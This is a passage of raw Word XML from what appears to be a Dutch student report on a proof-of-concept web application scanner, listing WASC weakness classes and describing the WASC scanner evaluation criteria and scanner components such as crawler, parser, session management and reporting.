            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F208E9" w14:textId="4F0F232D" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504CA0CB" w14:textId="704B86F8" w:rsidR="002836D1" w:rsidRDefault="00B04B1C" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Insecure</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Indexing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="5EA83FFF" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF6824B" w14:textId="561F03A8" w:rsidR="002836D1" w:rsidRDefault="007025D9" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EF167B7" w14:textId="11881242" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E24A3AE" w14:textId="0A9F4775" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Information </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Leakage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="75E143DA" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="514C0FC6" w14:textId="59DC184C" w:rsidR="002836D1" w:rsidRDefault="004730EE" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E05EFB3" w14:textId="3EBA1B58" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C99EE2" w14:textId="7934BB9C" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Insufficient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Authentication</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0E261ADA" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F12AF1D" w14:textId="3EF21C99" w:rsidR="002836D1" w:rsidRDefault="00623127" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD4DD0D" w14:textId="3DFC9117" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03311CAF" w14:textId="43EB5E81" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Insufficient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Athorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="70F9F579" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A03FF0" w14:textId="3F6A8863" w:rsidR="002836D1" w:rsidRDefault="00374C5F" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C1D7B1" w14:textId="0CDE43F2" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117C84A9" w14:textId="699E89AB" w:rsidR="002836D1" w:rsidRDefault="009D0671" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Server </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Misconfiguration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24FACCCB" w14:textId="460BA332" w:rsidR="001514C5" w:rsidRDefault="00030C1A" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E3943">
        <w:t>Tabel 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA22E0" w14:textId="77777777" w:rsidR="001A6577" w:rsidRDefault="001A6577">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470A457" w14:textId="2EE260D9" w:rsidR="00825BDD" w:rsidRDefault="008E1C57" w:rsidP="00C41D9B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WASSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29248CA3" w14:textId="5A0F83F3" w:rsidR="00051CAF" w:rsidRDefault="00825BDD" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">Het doel dat WASC wilt bereiken met </w:t>
      </w:r>
      <w:r w:rsidRPr="00825BDD">
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="008E1C57" w:rsidRPr="00825BDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E11C0" w:rsidRPr="00825BDD">
        <w:t>Web A</w:t>
      </w:r>
      <w:r w:rsidR="00BA68CA" w:rsidRPr="00825BDD">
        <w:t>pplication Security Scanner Evaluation</w:t>
      </w:r>
      <w:r w:rsidR="00C97F43">
        <w:t xml:space="preserve"> Criteria </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is een set van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guidelines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> te definiëren voor het evalueren van </w:t>
      </w:r>
      <w:r w:rsidR="00B00C73">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanners.</w:t>
      </w:r>
      <w:r w:rsidR="00446A47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30A3A">
        <w:t xml:space="preserve">Hiermee willen zij, de organisatie, </w:t>
      </w:r>
      <w:r w:rsidR="007C5654">
        <w:t xml:space="preserve">security professionals begeleiden bij het evalueren van </w:t>
      </w:r>
      <w:r w:rsidR="00B00C73">
        <w:t>webapplicaties</w:t>
      </w:r>
      <w:r w:rsidR="007C5654">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E1C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Met de WASSEC worden een aantal kenmerken van een </w:t>
      </w:r>
      <w:r w:rsidR="00B00C73">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner geëvalueerd zoals </w:t>
      </w:r>
      <w:r w:rsidR="008425E0">
        <w:t>het identificeren van kwetsbaarheden en de effectiviteit v</w:t>
      </w:r>
      <w:r w:rsidR="00D554FF">
        <w:t xml:space="preserve">an de </w:t>
      </w:r>
      <w:r w:rsidR="00B00C73">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00D554FF">
        <w:t xml:space="preserve"> test. </w:t>
      </w:r>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve">De WASSEC behandeld een variatie van componenten die deel uitmaken van een </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve"> scanner zoals: de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B96E68">
        <w:t>crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve">/spider, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B96E68">
        <w:t>parser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006770FA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006770FA">
        <w:t>data verwerker)</w:t>
      </w:r>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve">, sessie manager, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B96E68">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve"> vaardigheid en het component dat het rapport genereerd.</w:t>
      </w:r>
      <w:r w:rsidR="006770FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21039A17" w14:textId="28A807C9" w:rsidR="000B67E7" w:rsidRDefault="00B1749C" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">Nu zal ik ook </w:t>
      </w:r>
      <w:r w:rsidR="00200B29">
        <w:t xml:space="preserve">na het ontwikkelen van mijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00200B29">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00200B29">
        <w:t xml:space="preserve"> of Concept dit document gebruiken om op de correcte wijze een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00200B29">
        <w:t xml:space="preserve"> te evalueren, maar waar ik dit document primaire voor ga gebruiken is </w:t>
      </w:r>
      <w:r w:rsidR="00BB120F">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB120F">
        <w:t>requirement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB120F">
        <w:t xml:space="preserve"> document waarin ik beschrijf </w:t>
      </w:r>
      <w:r w:rsidR="00491407">
        <w:t xml:space="preserve">aan welke eisen de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00491407">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00491407">
        <w:t xml:space="preserve"> of Concept van de </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00491407">
        <w:t xml:space="preserve"> scanner moet voldoen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B193640" w14:textId="67B255B7" w:rsidR="00D404A0" w:rsidRDefault="009C5666" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">Het document behandeld alle onderwerpen die nodig zijn bij het uitvoeren en evalueren van een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scan. </w:t>
      </w:r>
      <w:r w:rsidR="007D7A79">
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve">laat zien waar een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve"> scanner aan moet voldoen en het op een effectieve manier gebruikt kan worden. </w:t>
      </w:r>
      <w:r w:rsidR="00745FB8">
        <w:t>De categorieën die behandeld worden in dit document</w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve"> zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1577"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3963"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF4630" w14:paraId="73992BFF" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B562FF" w14:textId="3FD1D3DB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35271848" w14:textId="3E329CC7" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DB5002" w14:textId="0B97C655" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Beschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="3F4A47B7" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D87D3B8" w14:textId="1BE6C67D" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5639DC95" w14:textId="67A3AF45" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D01F38" w14:textId="53AA58D8" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Voor het testen van webapplicaties zal de scanner de </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>communicatie protocollen</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> moeten ondersteunen die gebruikelijk zijn. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="13A72E00" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4730ECF6" w14:textId="2850DB60" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FADFCF1" w14:textId="2ED1F1AB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Authenticatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CD6BA3" w14:textId="74E0E40F" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">De ondersteuning van authenticatie voor het testen van </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicaties</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1F958943" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="738F19F6" w14:textId="49E46DD6" w:rsidR="00AF4630" w:rsidRDefault="0080785D" w:rsidP="00C41D9B">
            <w:r>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="00D46861">
              <w:t>roces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F9C6B21" w14:textId="3AFF69EA" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Sessie management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC67C25" w14:textId="0946C201" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Tijdens een scan is het belangrijk dat er een sessie onderhoudt wordt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="009B5CC9" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E40A91" w14:textId="32854C9C" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BF7F85" w14:textId="3F9FBB06" w:rsidR="00AF4630" w:rsidRDefault="009559DB" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Spider/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8BE34A" w14:textId="76BA03E6" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is een actie die uitgevoerd wordt bij het parsen van een webpagina. Hyperlinks worden verwerkt door de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="0A341814" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34388A90" w14:textId="661EE622" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634348C2" w14:textId="55763E15" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Parsing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>HTML verwerking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274B2E18" w14:textId="374CC669" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Vooraf van het scanproces is het nodig om een de website te verwerken, dit proces wordt door de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webcrawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/spider gedaan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1529D1CA" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47FB10A8" w14:textId="25869752" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8C6414" w14:textId="545E9CE4" w:rsidR="00AF4630" w:rsidRDefault="00C16E00" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Scanner/Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E7F835" w14:textId="11078A41" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Het testen van website op kwetsbaarheden is de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>kernfunctie van een web</w:t>
            </w:r>
            <w:r>
              <w:t>applicatie scanner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="4C550C3B" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DE8A2A0" w14:textId="77572645" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0061DF45" w14:textId="05BAE4D0" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Commando’s en controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45BF05F9" w14:textId="0A0A62CC" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">De commando’s waarmee de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicatie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> scanner wordt aangestuurd. Interactie tussen eindgebruiker en applicatie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="09B35066" w14:textId="77777777" w:rsidTr="00AF4630">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DF0EBBE" w14:textId="3605F320" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="271882F2" w14:textId="10B3D4A1" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72643788" w14:textId="2005F8A9" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Het genereren van rapporten op basis van de gevonden kwetsbaarheden. De resultaten kunnen dan buiten de interface van de applicatie bekeken worden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DDCBE75" w14:textId="6B9D1855" w:rsidR="0055640C" w:rsidRDefault="0055640C" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Tabel 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB59BD" w14:textId="5D70C4FE" w:rsidR="0001353E" w:rsidRDefault="002672C3" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">In tabel 3.5 wordt een </w:t>
      </w:r>
      <w:r w:rsidR="00E57576">
        <w:t>praktisch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> overzicht gegeven van waar een </w:t>
      </w:r>
      <w:r w:rsidR="00E81BA5">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner uit bestaat en aan moet voldoen. Sommige van deze componenten</w:t>
      </w:r>
      <w:r w:rsidR="00AF4630">
        <w:t xml:space="preserve"> en processen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zitten in elkaar verweven zoals de Protocol, Authenticatie, Sessie management</w:t>
      </w:r>
      <w:r w:rsidR="000143F2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000143F2">
        <w:t>parsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E57576">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000143F2">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000143F2">
        <w:t>HTML verwerking</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000143F2">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deel uitmaken van de Spider/</w:t>
